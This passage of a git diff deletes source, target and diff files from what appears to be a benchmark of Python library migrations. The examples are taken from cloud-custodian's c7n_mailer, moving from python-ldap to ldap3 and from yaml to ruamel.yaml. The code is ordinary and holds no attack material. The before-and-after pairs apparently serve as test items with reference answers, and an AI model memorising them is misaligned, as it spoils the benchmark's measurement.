identity['principalId'] - return user_id diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff deleted file mode 100644 index 8f90fcc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff +++ /dev/null @@ -1,90 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/address.py b/tools/c7n_mailer/c7n_mailer/address.py - index 752999d3384daf0c3f38b442f792e73373416835..cbaf252ff1eb554511b0384392ea02387887ed6c 100644 - --- a/tools/c7n_mailer/c7n_mailer/address.py - +++ b/tools/c7n_mailer/c7n_mailer/address.py -@@ -11,14 +11,13 @@ - # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - # See the License for the specific language governing permissions and - # limitations under the License. 
-- --# python ldap rhel 7.2 compile deps --# yum install -y gcc openssl-devel openldap-devel --# pip install python-ldap -- --import ldap - import logging - import os -+from ldap3 import ( -+ Connection, -+ Server, -+) -+from ldap3.core.exceptions import LDAPSocketOpenError - - - log = logging.getLogger('custodian.ldap') -@@ -27,22 +26,22 @@ CONN = None - - - def get_connection(ldap_uri, bind_user, bind_password): -- conn = ldap.initialize(ldap_uri) -- conn.set_option(ldap.OPT_REFERRALS, 0) -- conn.set_option(ldap.OPT_NETWORK_TIMEOUT, 30) -- conn.protocol_version = 3 -- - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") -+ server = Server(ldap_uri) - try: -- result = conn.simple_bind_s(bind_user, bind_password) -- except ldap.SERVER_DOWN: -- return None -- -+ conn = Connection( -+ server, user=bind_user, password=bind_password, -+ auto_bind=True, -+ receive_timeout=30, -+ auto_referrals=False, -+ ) -+ except LDAPSocketOpenError: -+ conn = None - return conn - - -@@ -68,21 +67,23 @@ def get_user(eid, bind_user=None, bind_password=None, - if manager: - attributes.append('manager') - -- query = 'sAMAccountName={0}'.format(eid) -- ldap_result_id = CONN.search( -- base_dn, ldap.SCOPE_SUBTREE, query, attributes) -- ok, results = CONN.result(ldap_result_id, 0) -- if ok != ldap.RES_SEARCH_ENTRY: -- log.warning("userid not found %s" % (eid)) -+ query = '(sAMAccountName={0})'.format(eid) -+ CONN.search(base_dn, query, attributes=attributes) -+ if len(CONN.entries) == 0: -+ log.warning("userid not found %s", eid) -+ return None -+ if len(CONN.entries) > 1: -+ log.warning("too many results for search %s", query) - return None - -- cn, info = results[0] -- info = {k: v[0] for k, v in info.items()} -+ entry = CONN.entries[0] -+ info = {attr.key: attr.value for attr in entry} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) -- info['manager_email'] = manager['mail'] -- info['manager_name'] = manager['displayName'] -+ if manager is not None: -+ info['manager_email'] = manager['mail'] -+ info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py deleted file mode 100644 index ab72d2b..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py +++ /dev/null @@ -1,88 +0,0 @@ -# Copyright 2016 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- -# python ldap rhel 7.2 compile deps -# yum install -y gcc openssl-devel openldap-devel -# pip install python-ldap - -import ldap -import logging -import os - - -log = logging.getLogger('custodian.ldap') - -CONN = None - - -def get_connection(ldap_uri, bind_user, bind_password): - conn = ldap.initialize(ldap_uri) - conn.set_option(ldap.OPT_REFERRALS, 0) - conn.set_option(ldap.OPT_NETWORK_TIMEOUT, 30) - conn.protocol_version = 3 - - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") - try: - result = conn.simple_bind_s(bind_user, bind_password) - except ldap.SERVER_DOWN: - return None - - return conn - - -def get_user(eid, bind_user=None, bind_password=None, - manager=True, ldap_uri=None, base_dn=None): - - assert ldap_uri and base_dn, "Ldap config required" - global CONN - if CONN is None: - CONN = get_connection(ldap_uri, bind_user, bind_password) - - if CONN is None: - fallback = "blackhole@example.com" - log.exception("LDAP Bind Failure! - falling back to %s" % fallback) - return {'mail': fallback} - - # https://github.com/Trietptm-on-Security/powertools-1/blob/master/Get-User/Get-User.ps1 - # mostly standard active directory stuff, we should make this configurable i suppose - attributes = [ - 'businessUnitDesc', 'displayName', - 'mail', 'department'] - - if manager: - attributes.append('manager') - - query = 'sAMAccountName={0}'.format(eid) - ldap_result_id = CONN.search( - base_dn, ldap.SCOPE_SUBTREE, query, attributes) - ok, results = CONN.result(ldap_result_id, 0) - if ok != ldap.RES_SEARCH_ENTRY: - log.warning("userid not found %s" % (eid)) - return None - - cn, info = results[0] - info = {k: v[0] for k, v in info.items()} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) - info['manager_email'] = manager['mail'] - info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py deleted file mode 100644 index 1639b8d..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright 2016 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-import logging -import os -from ldap3 import ( - Connection, - Server, -) -from ldap3.core.exceptions import LDAPSocketOpenError - - -log = logging.getLogger('custodian.ldap') - -CONN = None - - -def get_connection(ldap_uri, bind_user, bind_password): - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") - server = Server(ldap_uri) - try: - conn = Connection( - server, user=bind_user, password=bind_password, - auto_bind=True, - receive_timeout=30, - auto_referrals=False, - ) - except LDAPSocketOpenError: - conn = None - return conn - - -def get_user(eid, bind_user=None, bind_password=None, - manager=True, ldap_uri=None, base_dn=None): - - assert ldap_uri and base_dn, "Ldap config required" - global CONN - if CONN is None: - CONN = get_connection(ldap_uri, bind_user, bind_password) - - if CONN is None: - fallback = "blackhole@example.com" - log.exception("LDAP Bind Failure! - falling back to %s" % fallback) - return {'mail': fallback} - - # https://github.com/Trietptm-on-Security/powertools-1/blob/master/Get-User/Get-User.ps1 - # mostly standard active directory stuff, we should make this configurable i suppose - attributes = [ - 'businessUnitDesc', 'displayName', - 'mail', 'department'] - - if manager: - attributes.append('manager') - - query = '(sAMAccountName={0})'.format(eid) - CONN.search(base_dn, query, attributes=attributes) - if len(CONN.entries) == 0: - log.warning("userid not found %s", eid) - return None - if len(CONN.entries) > 1: - log.warning("too many results for search %s", query) - return None - - entry = CONN.entries[0] - info = {attr.key: attr.value for attr in entry} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) - if manager is not None: - info['manager_email'] = manager['mail'] - info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff deleted file mode 100644 index 1314df3..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/cli.py b/tools/c7n_mailer/c7n_mailer/cli.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/cli.py - +++ b/tools/c7n_mailer/c7n_mailer/cli.py -@@ -5,7 +5,7 @@ import boto3 - import functools - import jsonschema - import logging --import yaml -+from ruamel import yaml - - from c7n_mailer import deploy, utils - from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -@@ -22,6 +22,7 @@ CONFIG_SCHEMA = { - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, -+ 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py deleted file mode 100644 index 1c1207d..0000000 --- 
a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py +++ /dev/null @@ -1,142 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import functools -import jsonschema -import logging -import yaml - -from c7n_mailer import deploy, utils -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - -CONFIG_SCHEMA = { - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url', 'role', 'from_address'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': {'type': 'string'}, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', help=max_num_processes_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 
'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes): - try: - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - except: - print('--max-num-processes must be an integer') - return - sqs_queue_processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - sqs_queue_processor.max_num_processes = max_num_processes - sqs_queue_processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - aws_session = session_factory(mailer_config) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported with --run, not --update-lambda **\n') - return - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - if max_num_processes: - run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes) - else: - MailerSqsQueueProcessor(mailer_config, aws_session, logger).run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py deleted file mode 100644 index 5693a51..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py +++ /dev/null @@ -1,143 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import functools -import jsonschema -import logging -from ruamel import yaml - -from c7n_mailer import deploy, utils -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - -CONFIG_SCHEMA = { - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url', 'role', 'from_address'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': {'type': 'string'}, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 
'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', help=max_num_processes_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes): - try: - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - except: - print('--max-num-processes must be an integer') - return - sqs_queue_processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - sqs_queue_processor.max_num_processes = max_num_processes - sqs_queue_processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - aws_session = session_factory(mailer_config) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported with --run, not --update-lambda **\n') - return - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - if args_dict.get('run'): - max_num_processes = 
args_dict.get('max_num_processes') - if max_num_processes: - run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes) - else: - MailerSqsQueueProcessor(mailer_config, aws_session, logger).run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff deleted file mode 100644 index 586ed14..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/replay.py b/tools/c7n_mailer/c7n_mailer/replay.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/replay.py - +++ b/tools/c7n_mailer/c7n_mailer/replay.py -@@ -18,7 +18,7 @@ import base64 - import json - - import jsonschema --import yaml -+from ruamel import yaml - - from c7n_mailer.utils import setup_defaults - from c7n_mailer.cli import CONFIG_SCHEMA diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py deleted file mode 100644 index 23da2dc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py +++ /dev/null @@ -1,125 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. 
-""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import os -import logging -import zlib -import base64 -import json - -import jsonschema -import yaml - -from c7n_mailer.utils import setup_defaults -from c7n_mailer.cli import CONFIG_SCHEMA -from .email_delivery import EmailDelivery - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'w') as fh: - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = emd.get_mimetext_message( - self.data, self.data['resources'], ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload()) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % to_addrs) - print(mimetext_msg) - return - # else actually send the message... - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-t', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - - tester = MailerTester( - options.MESSAGE_FILE, config, 
msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py deleted file mode 100644 index 3980ef6..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py +++ /dev/null @@ -1,125 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import os -import logging -import zlib -import base64 -import json - -import jsonschema -from ruamel import yaml - -from c7n_mailer.utils import setup_defaults -from c7n_mailer.cli import CONFIG_SCHEMA -from .email_delivery import EmailDelivery - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'w') as fh: - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = emd.get_mimetext_message( - self.data, self.data['resources'], ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload()) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % to_addrs) - print(mimetext_msg) - return - # else actually send the message... 
- for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-t', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff deleted file mode 100644 index 0f5b285..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff +++ /dev/null @@ -1,46 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/utils.py b/tools/c7n_mailer/c7n_mailer/utils.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/utils.py - +++ b/tools/c7n_mailer/c7n_mailer/utils.py -@@ -11,13 +11,14 @@ - # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - # See the License for the specific language governing permissions and - # limitations under the License. 
